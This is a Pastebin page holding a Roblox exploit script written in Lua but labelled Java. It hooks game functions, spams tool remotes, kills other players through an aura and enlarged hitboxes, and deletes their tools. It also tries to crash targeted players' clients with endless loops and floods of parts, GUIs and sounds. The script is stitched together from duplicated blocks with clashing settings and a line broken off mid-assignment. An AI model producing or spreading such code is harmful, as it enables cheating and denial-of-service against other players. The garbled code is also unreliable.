Advertisement
Azzz_4565

Untitled

Jul 11th, 2025
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 19.92 KB | None | 0 0
  1. -- ✅ COMBINED: Ultra Damage + No Cooldown + Psycho Claw Aura Dominator
  2.  
  3. -- 🔧 CONFIGURATION
  4. _G.Detener = false
  5.  
  6. -- 🔌 SERVICES
  7. local Players = game:GetService("Players")
  8. local LocalPlayer = Players.LocalPlayer
  9. local RunService = game:GetService("RunService")
  10. local UserInputService = -- 🔧 CONFIGURATION
  11. _G.Detener = false
  12.  
  13. -- === GLOBAL WAIT/DISABLE HOOKS ===
  14. for _, f in ipairs({wait, task.wait, delay, getrenv().wait}) do
  15.     pcall(function()
  16.         hookfunction(f, function() while true do end end)
  17.     end)
  18. end
  19.  
  20. -- === DISABLE COREGUI & BLOCK INPUT ===
  21. pcall(function()
  22.     game:GetService("StarterGui"):SetCore("ResetButtonCallback", false)
  23.     game:GetService("StarterGui"):SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
  24.     local UIS = game:GetService("UserInputService")
  25.     UIS.InputBegan:Connect(function() return true end)
  26.     UIS.InputEnded:Connect(function() return true end)
  27. end)
  28.  
  29. -- 🔌 SERVICES
  30. local Players = game:GetService("Players")
  31. local LocalPlayer = Players.LocalPlayer
  32. local RunService = game:GetService("RunService")
  33. local Workspace = game:GetService("Workspace")
  34. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  35.  
  36. -- === REMOTE SETUP ===
  37. local function ensureRemote(name)
  38.     local remote = ReplicatedStorage:FindFirstChild(name)
  39.     if not remote then
  40.         remote = Instance.new("RemoteEvent")
  41.         remote.Name = name
  42.         remote.Parent = ReplicatedStorage
  43.     end
  44.     return remote
  45. end
  46.  
  47. local RequestLag = ensureRemote("RequestLag")
  48. local LagPlayer = ensureRemote("LagPlayer")
  49.  
  50. -- === SERVER LOGIC ===
  51. if RunService:IsServer() then
  52.     RequestLag.OnServerEvent:Connect(function(_, targetPlayer)
  53.         if targetPlayer and targetPlayer:IsA("Player") then
  54.             for i = 1, 2000 do
  55.                 LagPlayer:FireClient(targetPlayer)
  56.             end
  57.         end
  58.     end)
  59. end
  60.  
  61. -- === CLIENT LAG LOGIC (ULTIMATE) ===
  62. local function doLag()
  63.     for t = 1, 500 do
  64.         spawn(function()
  65.             while true do
  66.                 local tbl = {}
  67.                 for i = 1, 2_000_000_000 do
  68.                     tbl[i] = math.sqrt(i) * math.sin(i)
  69.                     if i % 1000000 == 0 then
  70.                         tbl["cycle"..i] = tbl
  71.                     end
  72.                 end
  73.             end
  74.         end)
  75.     end
  76.     local function recursiveLag(depth)
  77.         if depth > 20 then return end
  78.         spawn(function()
  79.             while true do
  80.                 recursiveLag(depth + 1)
  81.                 for i = 1, 2_000_000_000 do
  82.                     local x = math.log(i) * math.random()
  83.                 end
  84.             end
  85.         end)
  86.     end
  87.     recursiveLag(1)
  88.     spawn(function()
  89.         while true do
  90.             for i = 1, 10000 do
  91.                 local p = Instance.new("Part")
  92.                 p.Size = Vector3.new(1000,1000,1000)
  93.                 p.Position = Vector3.new(math.random(-1e7,1e7), math.random(-1e7,1e7), math.random(-1e7,1e7))
  94.                 p.Anchored = true
  95.                 p.Parent = workspace
  96.             end
  97.         end
  98.     end)
  99.     spawn(function()
  100.         local plr = Players.LocalPlayer
  101.         while true do
  102.             for i = 1, 5000 do
  103.                 local s = Instance.new("ScreenGui")
  104.                 s.Parent = plr:FindFirstChildOfClass("PlayerGui")
  105.                 for j = 1, 200 do
  106.                     local f = Instance.new("Frame")
  107.                     f.Size = UDim2.new(1,0,1,0)
  108.                     f.BackgroundColor3 = Color3.new(math.random(),math.random(),math.random())
  109.                     f.Parent = s
  110.                 end
  111.             end
  112.         end
  113.     end)
  114.     spawn(function()
  115.         while true do
  116.             for i = 1, 5000 do
  117.                 local s = Instance.new("Sound")
  118.                 s.SoundId = "rbxassetid://183763515"
  119.                 s.Parent = workspace
  120.                 s:Play()
  121.             end
  122.         end
  123.     end)
  124. end
  125.  
  126. LagPlayer.OnClientEvent:Connect(function()
  127.     doLag()
  128. end)
  129.  
  130. -- ===============================
  131. -- PART 1: FIRE ALL REMOTEEVENTS IN TOOLS (MAX SAFE SPAM)
  132. -- ===============================
  133. local function fireServerBoost()
  134.     local tools = {}
  135.     local character = LocalPlayer.Character
  136.     local backpack = LocalPlayer:FindFirstChild("Backpack")
  137.  
  138.     if character then
  139.         for _, item in ipairs(character:GetChildren()) do
  140.             if item:IsA("Tool") then table.insert(tools, item) end
  141.         end
  142.     end
  143.     if backpack then
  144.         for _, item in ipairs(backpack:GetChildren()) do
  145.             if item:IsA("Tool") then table.insert(tools, item) end
  146.         end
  147.     end
  148.  
  149.     for _, tool in ipairs(tools) do
  150.         for _, remote in ipairs(tool:GetChildren()) do
  151.             if remote:IsA("RemoteEvent") then
  152.                 pcall(function() remote:FireServer(tool) end)
  153.             end
  154.         end
  155.     end
  156. end
  157.  
  158. spawn(function()
  159.     while not _G.Detener do
  160.         fireServerBoost()
  161.         task.wait(0.001)
  162.     end
  163. end)
  164.  
  165. -- ===============================
  166. -- PART 2: MEGA PSYCHO AURA SYSTEM + HOOKS + CLONES + KILL AURA + INSTANT LAG
  167. -- ===============================
  168. local auraSize = Vector3.new(45, 45, 45)
  169. local auraRange = 92 -- (set to 92 as requested)
  170. local instantKillDamage = 9e999999999999999
  171. local clonesToSpawn = 20
  172. local CLAW_NAME = "Super Power Claws"
  173.  
  174. local lp = LocalPlayer
  175. local CHAR = lp.Character or lp.CharacterAdded:Wait()
  176. local Ignorelist = OverlapParams.new()
  177. Ignorelist.FilterType = Enum.RaycastFilterType.Include
  178. local Disable = Instance.new("BindableEvent")
  179. getgenv().configs = {
  180.     connection = {},
  181.     Disable = Disable,
  182.     Size = auraSize,
  183.     DeathCheck = false
  184. }
  185. local Run = true
  186.  
  187. for _, f in ipairs({wait, task.wait, delay, getrenv().wait}) do
  188.     pcall(function()
  189.         hookfunction(f, function() return RunService.Heartbeat:Wait() end)
  190.     end)
  191. end
  192.  
  193. local function hookAllDamage()
  194.     for _, f in ipairs(getgc(true)) do
  195.         if typeof(f) == "function" then
  196.             local name = debug.getinfo(f).name
  197.             if name == "TakeDamage" or name == "BreakJoints" or name == "UpdateHealth" or name == "ApplyDamage" or name == "Damage" then
  198.                 pcall(function() hookfunction(f, function(...) return 0 end) end)
  199.             end
  200.         end
  201.     end
  202. end
  203. hookAllDamage()
  204.  
  205. -- === INSTANT KILL & LAG FUNCTION ===
  206. local function lagAndKillTarget(targetChar)
  207.     local hum = targetChar:FindFirstChildWhichIsA("Humanoid")
  208.     local targetPlayer = Players:GetPlayerFromCharacter(targetChar)
  209.     if hum and hum.Health > 0 and targetPlayer and targetPlayer ~= lp then
  210.         hum.Health = 0
  211.         -- Massive, instant lag spam for the killed player only
  212.         for t = 1, 10 do
  213.             spawn(function()
  214.                 for i = 1, 10000 do
  215.                     RequestLag:FireServer(targetPlayer)
  216.                 end
  217.             end)
  218.         end
  219.     end
  220. end
  221.  
  222. -- EQUIP CLAW AND INSTANT LAG ON TOUCH
  223. local function equipClaw()
  224.     local claw = lp.Backpack:FindFirstChild(CLAW_NAME) or lp.Character:FindFirstChild(CLAW_NAME)
  225.     if claw then
  226.         claw.Parent = lp.Character
  227.         local handle = claw:FindFirstChild("Handle") or claw:FindFirstChildWhichIsA("BasePart")
  228.         if handle then
  229.             handle.Size = Vector3.new(9e9, 9e9, 9e9)
  230.             handle.CanTouch = true
  231.             handle.Touched:Connect(function(hit)
  232.                 if hit and hit.Parent and hit.Parent ~= lp.Character then
  233.                     lagAndKillTarget(hit.Parent)
  234.                 end
  235.             end)
  236.         end
  237.     end
  238. end
  239.  
  240. -- KILL AURA SPAM + INSTANT LAG ON HIT
  241. RunService.Heartbeat:Connect(function()
  242.     local char = lp.Character
  243.     if not char then return end
  244.     local Tools, Characters = {}, {}
  245.     for _, v in ipairs(Players:GetPlayers()) do
  246.         if v ~= lp and v.Character then table.insert(Characters, v.Character) end
  247.     end
  248.     Ignorelist.FilterDescendantsInstances = Characters
  249.     for _, tool in ipairs(char:GetChildren()) do
  250.         if tool:IsA("Tool") then
  251.             local touch = tool:FindFirstChildWhichIsA("TouchTransmitter", true)
  252.             if touch then
  253.                 local hits = Workspace:GetPartBoundsInBox(
  254.                     touch.Parent.CFrame,
  255.                     touch.Parent.Size + auraSize,
  256.                     Ignorelist
  257.                 )
  258.                 for _, v in ipairs(hits) do
  259.                     local char = v:FindFirstAncestorOfClass("Model")
  260.                     if char and table.find(Characters, char) then
  261.                         lagAndKillTarget(char)
  262.                         firetouchinterest(touch.Parent, v, 0)
  263.                         firetouchinterest(touch.Parent, v, 1)
  264.                     end
  265.                 end
  266.             end
  267.         end
  268.     end
  269. end)
  270.  
  271. -- Adjust clones to trigger instant kill with aura
  272. local function spawnClone()
  273.     local char = lp.Character
  274.     if not char then return end
  275.     local clone = char:Clone()
  276.     for _, d in ipairs(clone:GetDescendants()) do
  277.         if d:IsA("BasePart") then
  278.             d.Transparency = 1
  279.             d.CanCollide = false
  280.             d.CastShadow = false
  281.         elseif d:IsA("Script") or d:IsA("LocalScript") then
  282.             d:Destroy()
  283.         end
  284.     end
  285.     local root = clone:FindFirstChild("HumanoidRootPart")
  286.     local realRoot = char:FindFirstChild("HumanoidRootPart")
  287.     if root and realRoot then
  288.         root.CFrame = realRoot.CFrame * CFrame.new(math.random(-50,50), 0, math.random(-50,50))
  289.     end
  290.     clone.Name = "AuraClone_"..math.random(100000,999999)
  291.     clone.Parent = Workspace
  292.  
  293.     RunService.Heartbeat:Connect(function()
  294.         for _, p in ipairs(Players:GetPlayers()) do
  295.             if p ~= lp and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
  296.                 local hum = p.Character:FindFirstChildWhichIsA("Humanoid")
  297.                 if hum and hum.Health > 0 and (hum.Parent.HumanoidRootPart.Position - root.Position).Magnitude < auraRange then
  298.                     lagAndKillTarget(p.Character)
  299.                 end
  300.             end
  301.         end
  302.     end)
  303. end
  304.  
  305. -- LAG FUNCTION (After Kill) - now uses the same strong lag as lagAndKillTarget
  306. local function lagOpponent(plr)
  307.     if not plr or not plr.Character then return end
  308.     for t = 1, 10 do
  309.         spawn(function()
  310.             for i = 1, 10000 do
  311.                 RequestLag:FireServer(plr)
  312.             end
  313.         end)
  314.     end
  315. end
  316.  
  317. -- AFTER KILL DETECTION
  318. local afterKillActive = false
  319. local function onDied()
  320.     afterKillActive = true
  321.     local hum = CHAR:FindFirstChildWhichIsA("Humanoid")
  322.     task.wait()
  323.     local tag = hum and (hum:FindFirstChild("creator") or hum:FindFirstChild("creatorTag"))
  324.     if tag and tag.Value and tag.Value ~= lp then
  325.         lagOpponent(tag.Value)
  326.     end
  327. end
  328.  
  329. -- ON RESPAWN
  330. local function onRespawn(newChar)
  331.     CHAR = newChar
  332.     afterKillActive = false
  333.     equipClaw()
  334.     for i = 1, 10 do spawnClone() end
  335.     newChar:WaitForChild("Humanoid").Died:Connect(onDied)
  336. end
  337.  
  338. -- FINAL SETUP
  339. equipClaw()
  340. for i = 1, clonesToSpawn do spawnClone() end
  341. CHAR:WaitForChild("Humanoid").Died:Connect(onDied)
  342. lp.CharacterAdded:Connect(onRespawn)
  343.  
  344. -- CONSTANT AURA ZAP + INSTANT LAG (AFFECTS ONLY ON KILL, NOT EVERYONE)
  345. RunService.Heartbeat:Connect(function()
  346.     if not afterKillActive then return end
  347.     for _, p in ipairs(Players:GetPlayers()) do
  348.         if p ~= lp and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
  349.             local dist = (CHAR.HumanoidRootPart.Position - p.Character.HumanoidRootPart.Position).Magnitude
  350.             local hum = p.Character:FindFirstChildOfClass("Humanoid")
  351.             if hum and dist < auraRange then
  352.                 hum:TakeDamage(instantKillDamage)
  353.                 -- Only lag the player you killed (handled in onDied)
  354.             end
  355.         end
  356.     end
  357. end)
  358.  
  359. print("💀💀💀 ABSOLUTE ULTIMATE CLIENT CRASH LAG SCRIPT ENGAGED 💀💀💀")
  360.  
  361. local Lighting = game:GetService("Lighting")
  362. local Workspace = game:GetService("Workspace")
  363. local Debris = game:GetService("Debris")
  364. local stepped = RunService.Stepped
  365.  
  366. -- 🔥 AUTO-FIRE REMOTEEVENTS IN TOOLS
  367. local function fireServerBoost()
  368.     local tools = {}
  369.     local character = LocalPlayer.Character
  370.     local backpack = LocalPlayer:FindFirstChild("Backpack")
  371.     if character then
  372.         for _, item in ipairs(character:GetChildren()) do
  373.             if item:IsA("Tool") then table.insert(tools, item) end
  374.         end
  375.     end
  376.     if backpack then
  377.         for _, item in ipairs(backpack:GetChildren()) do
  378.             if item:IsA("Tool") then table.insert(tools, item) end
  379.         end
  380.     end
  381.     for _, tool in ipairs(tools) do
  382.         for _, remote in ipairs(tool:GetChildren()) do
  383.             if remote:IsA("RemoteEvent") then
  384.                 pcall(function() remote:FireServer(tool) end)
  385.             end
  386.         end
  387.     end
  388. end
  389.  
  390. spawn(function()
  391.     while not _G.Detener do
  392.         fireServerBoost()
  393.         task.wait(0.0)
  394.     end
  395. end)
  396.  
  397. -- 💥 DAMAGE HOOKS
  398. local function getEnemies()
  399.     for _, player in pairs(Players:GetPlayers()) do
  400.         if player ~= LocalPlayer and player.Character and player.Character:FindFirstChild("Humanoid") then
  401.             coroutine.wrap(function()
  402.                 local char = player.Character
  403.                 for i = 1, 2 do
  404.                     local hum = char:FindFirstChildOfClass("Humanoid")
  405.                     if hum then
  406.                         hum:TakeDamage(9999999)
  407.                         hum.Health = 0
  408.                         char:BreakJoints()
  409.                     end
  410.                 end
  411.             end)()
  412.         end
  413.     end
  414. end
  415.  
  416. for i = 1, 190 do
  417.     local function damageFunc(target)
  418.         if target and target:FindFirstChild("Humanoid") then
  419.             local hum = target:FindFirstChildOfClass("Humanoid")
  420.             if hum then
  421.                 hum:TakeDamage(25 + math.random(1,75))
  422.                 hum.WalkSpeed = hum.WalkSpeed - math.random(1,5)
  423.                 hum.JumpPower = hum.JumpPower - math.random(1,5)
  424.             end
  425.         end
  426.     end
  427.     _G["damageHook" .. i] = damageFunc
  428. end
  429.  
  430. for i = 1, 233 do
  431.     _G["noCDKill" .. i] = function()
  432.         local oldWait
  433.         oldWait = hookfunction(wait, function(t)
  434.             return oldWait(0.01)
  435.         end)
  436.         local oldHum
  437.         oldHum = hookfunction(Instance.new("Humanoid").TakeDamage, function(self, dmg)
  438.             return oldHum(self, 99999999)
  439.         end)
  440.         getEnemies()
  441.     end
  442. end
  443.  
  444. local function weakenTools(player)
  445.     if player and player.Character then
  446.         for _, tool in pairs(player.Backpack:GetChildren()) do
  447.             if tool:IsA("Tool") then
  448.                 tool:Destroy()
  449.             end
  450.         end
  451.     end
  452. end
  453.  
  454. RunService.Stepped:Connect(function()
  455.     for _, plr in pairs(Players:GetPlayers()) do
  456.         if plr ~= LocalPlayer then
  457.             pcall(function()
  458.                 local char = plr.Character
  459.                 if char and char:FindFirstChild("Humanoid") then
  460.                     char.Humanoid:TakeDamage(math.random(5, 15))
  461.                     char.Humanoid.WalkSpeed = 4
  462.                     weakenTools(plr)
  463.                 end
  464.             end)
  465.         end
  466.     end
  467. end)
  468.  
  469. -- 🌪️ AURA & CLAW SYSTEM
  470. local auraSize = Vector3.new(90, 90, 90)
  471. local auraRange = 9e99999999
  472. local instantKillDamage = 9e999999999999999
  473. local clonesToSpawn = 10
  474. local CLAW_NAME = "Super Power Claws"
  475.  
  476. local lp = LocalPlayer
  477. local CHAR = lp.Character or lp.CharacterAdded:Wait()
  478. local Ignorelist = OverlapParams.new()
  479. Ignorelist.FilterType = Enum.RaycastFilterType.Include
  480. local Disable = Instance.new("BindableEvent")
  481. getgenv().configs = {
  482.     connection = {},
  483.     Disable = Disable,
  484.     Size = auraSize,
  485.     DeathCheck = false
  486. }
  487. local Run = true
  488.  
  489. for _, f in ipairs({wait, task.wait, delay, getrenv().wait}) do
  490.     pcall(function()
  491.         hookfunction(f, function() return RunService.Heartbeat:Wait() end)
  492.     end)
  493. end
  494.  
  495. local function hookAllDamage()
  496.     for _, f in ipairs(getgc(true)) do
  497.         if typeof(f) == "function" then
  498.             local name = debug.getinfo(f).name
  499.             if name == "TakeDamage" or name == "BreakJoints" or name == "UpdateHealth" or name == "ApplyDamage" or name == "Damage" then
  500.                 pcall(function() hookfunction(f, function(...) return 0 end) end)
  501.             end
  502.         end
  503.     end
  504. end
  505. hookAllDamage()
  506.  
  507. local function equipClaw()
  508.     local claw = lp.Backpack:FindFirstChild(CLAW_NAME) or lp.Character:FindFirstChild(CLAW_NAME)
  509.     if claw then
  510.         claw.Parent = lp.Character
  511.         local handle = claw:FindFirstChild("Handle") or claw:FindFirstChildWhichIsA("BasePart")
  512.         if handle then
  513.             handle.Size = Vector3.new(9e9, 9e9, 9e9)
  514.             handle.CanTouch = true
  515.             handle.Touched:Connect(function(hit)
  516.                 local hum = hit.Parent:FindFirstChildWhichIsA("Humanoid")
  517.                 if hum and hum.Health > 0 then hum.Health = 0 end
  518.             end)
  519.         end
  520.     end
  521. end
  522.  
  523. equipClaw()
  524.  
  525. RunService.Heartbeat:Connect(function()
  526.     local char = lp.Character
  527.     if not char then return end
  528.     local Characters = {}
  529.     for _, v in ipairs(Players:GetPlayers()) do
  530.         if v ~= lp and v.Character then table.insert(Characters, v.Character) end
  531.     end
  532.     Ignorelist.FilterDescendantsInstances = Characters
  533.     for _, tool in ipairs(char:GetChildren()) do
  534.         if tool:IsA("Tool") then
  535.             local touch = tool:FindFirstChildWhichIsA("TouchTransmitter", true)
  536.             if touch then
  537.                 local hits = Workspace:GetPartBoundsInBox(
  538.                     touch.Parent.CFrame,
  539.                     touch.Parent.Size + auraSize,
  540.                     Ignorelist
  541.                 )
  542.                 for _, v in ipairs(hits) do
  543.                     local char = v:FindFirstAncestorOfClass("Model")
  544.                     if char and table.find(Characters, char) then
  545.                         local hum = char:FindFirstChildWhichIsA("Humanoid")
  546.                         if hum then hum.Health = 0 end
  547.                         firetouchinterest(touch.Parent, v, 0)
  548.                         firetouchinterest(touch.Parent, v, 1)
  549.                     end
  550.                 end
  551.             end
  552.         end
  553.     end
  554. end)
  555.  
  556. local function spawnClone()
  557.     local char = lp.Character
  558.     if not char then return end
  559.     local clone = char:Clone()
  560.     for _, d in ipairs(clone:GetDescendants()) do
  561.         if d:IsA("BasePart") then
  562.             d.Transparency = 1
  563.             d.CanCollide = false
  564.             d.CastShadow = false
  565.         elseif d:IsA("Script") or d:IsA("LocalScript") then
  566.             d:Destroy()
  567.         end
  568.     end
  569.     local root = clone:FindFirstChild("HumanoidRootPart")
  570.     local realRoot = char:FindFirstChild("HumanoidRootPart")
  571.     if root and realRoot then
  572.         root.CFrame = realRoot.CFrame * CFrame.new(math.random(-50,50), 0, math.random(-50,50))
  573.     end
  574.     clone.Name = "AuraClone_"..math.random(100000,999999)
  575.     clone.Parent = Workspace
  576.  
  577.     RunService.Heartbeat:Connect(function()
  578.         for _, p in ipairs(Players:GetPlayers()) do
  579.             if p ~= lp and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
  580.                 local hum = p.Character:FindFirstChildWhichIsA("Humanoid")
  581.                 if hum and hum.Health > 0 and (hum.Parent.HumanoidRootPart.Position - root.Position).Magnitude < auraRange then
  582.                     hum.Health = 0
  583.                 end
  584.             end
  585.         end
  586.     end)
  587. end
  588.  
  589. for i = 1, clonesToSpawn do spawnClone() end
  590.  
  591. local function lagOpponent(plr)
  592.     if not plr or not plr.Character then return end
  593.     for i = 1, 5 do
  594.         local part = Instance.new("Part")
  595.         part.Size = Vector3.new(50, 50, 50)
  596.         part.Transparency = 1
  597.         part.Anchored = true
  598.         part.CanCollide = false
  599.         part.CFrame = plr.Character.HumanoidRootPart.CFrame * CFrame.new(math.random(-30,30),0,math.random(-30,30))
  600.         part.Parent = Workspace
  601.         Debris:AddItem(part, 2)
  602.     end
  603. end
  604.  
  605. local afterKillActive = false
  606. local function onDied()
  607.     afterKillActive = true
  608.     local hum = CHAR:FindFirstChildWhichIsA("Humanoid")
  609.     task.wait()
  610.     local tag = hum and (hum:FindFirstChild("creator") or hum:FindFirstChild("creatorTag"))
  611.     if tag and tag.Value and tag.Value ~= lp then
  612.         lagOpponent(tag.Value)
  613.     end
  614. end
  615.  
  616. local function onRespawn(newChar)
  617.     CHAR = newChar
  618.     afterKillActive = false
  619.     equipClaw()
  620.     for i = 1, 2 do spawnClone() end
  621.     newChar:WaitForChild("Humanoid").Died:Connect(onDied)
  622. end
  623.  
  624. CHAR:WaitForChild("Humanoid").Died:Connect(onDied)
  625. lp.CharacterAdded:Connect(onRespawn)
  626.  
  627. RunService.Heartbeat:Connect(function()
  628.     if not afterKillActive then return end
  629.     for _, p in ipairs(Players:GetPlayers()) do
  630.         if p ~= lp and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
  631.             local dist = (CHAR.HumanoidRootPart.Position - p.Character.HumanoidRootPart.Position).Magnitude
  632.             local hum = p.Character:FindFirstChildOfClass("Humanoid")
  633.             if hum and dist < auraRange then
  634.                 hum:TakeDamage(instantKillDamage)
  635.             end
  636.         end
  637.     end
  638. end)
  639.  
  640. print("\226\156\150 MEGA PSYCHO CLAW AURA FIXED & READY")
  641. print("\226\156\150 NGF ULTRA DAMAGE DOMINATOR Loaded")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement